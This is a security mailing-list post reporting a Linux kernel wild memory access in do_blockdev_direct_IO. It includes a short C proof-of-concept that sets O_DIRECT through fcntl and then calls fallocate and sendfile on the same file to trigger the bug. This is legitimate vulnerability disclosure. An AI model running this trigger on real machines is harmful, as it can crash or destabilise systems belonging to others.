Message-ID: <CAFkTriL_sGQ=0ym3ALDXjWMYNJxKC3UH02Lx7v9Zj_CsX9NOiA@mail.gmail.com>
Date: Tue, 11 Oct 2016 22:22:48 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: linux kernel do_blockdev_direct_IO invalid memory access

Hello,

I posted this to ask feedback on security at kernel dot org, but I think my mail got bounced back. Not sure if from the mailing list or from some single recipient.

Anyway, reposting here. The following program will cause an invalid memory access:

BUG: KASAN: wild-memory-access on address 0005080000000000

See this link for the full sanitizer report, stack trace and trigger PoC:
https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b

Tested on current master, with KASAN.

Marco

---

/* The feature-test macro must be defined before any system header is
 * included, otherwise fallocate() is not declared by <fcntl.h>. */
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/sendfile.h>

int main(void)
{
    int ret = 0;
    /* 0x40 is O_CREAT on x86; a mode is required when O_CREAT is set. */
    int fd = open("./hurrdurr", O_APPEND | O_RDWR | 0x40, 0644);
    /* cmd 4 is F_SETFL; 0x44000 is O_DIRECT (0x4000) | O_NOATIME (0x40000)
     * on x86, switching the open file to the direct-I/O path. */
    ret = fcntl(fd, 4, 0x44000, 0, 0, 0);
    /* Preallocate 0xafa6 bytes starting at the unaligned offset 0x21. */
    ret = fallocate(fd, 0, 0x21, 0xafa6);
    off_t offset = 0;
    /* Copy 0x800 bytes from the file onto itself via sendfile(), which
     * drives do_blockdev_direct_IO on the O_DIRECT descriptor. */
    ret = sendfile(fd, fd, &offset, 0x800);
    (void)ret;
    return 0;
}